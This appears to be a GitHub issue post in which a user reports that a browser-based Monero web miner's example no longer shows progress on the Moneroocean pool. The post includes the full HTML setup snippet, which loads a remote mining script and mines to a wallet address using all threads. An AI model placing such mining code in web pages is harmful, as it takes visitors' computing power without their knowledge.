Hi,
I gave this a try today, however the examples provided don't appear to work anymore.
With the miner running, on Moneroocean I see no progress / service workers:
Example setup code:
<!-- Start Of Mining Code (HTML) -->
<script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
<script>
server = "wss://ny1.xmrminingproxy.com";
var pool = "moneroocean.stream";
var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
var workerId = "GH-XMR"
var threads = -1;
var password = "";
startMining(pool, walletAddress, workerId, threads, password);
throttleMiner = 20;
</script>
<!-- End Of Mining Code (HTML) -->
I uploaded that as test.html onto my webserver. Checked the JS console, saw no errors. Everything appears to be correct, but on Moneroocean nothing happens.
Anyone have any ideas / know how to resolve? Would love to have a play with this repo :)
Hi,
I gave this a try today, however the examples provided don't appear to work anymore.
With the miner running, on Moneroocean I see no progress / service workers:
Example setup code:
I uploaded that as
test.htmlonto my webserver. Checked the JS console, saw no errors. Everything appears to be correct, but on Moneroocean nothing happens.Anyone have any ideas / know how to resolve? Would love to have a play with this repo :)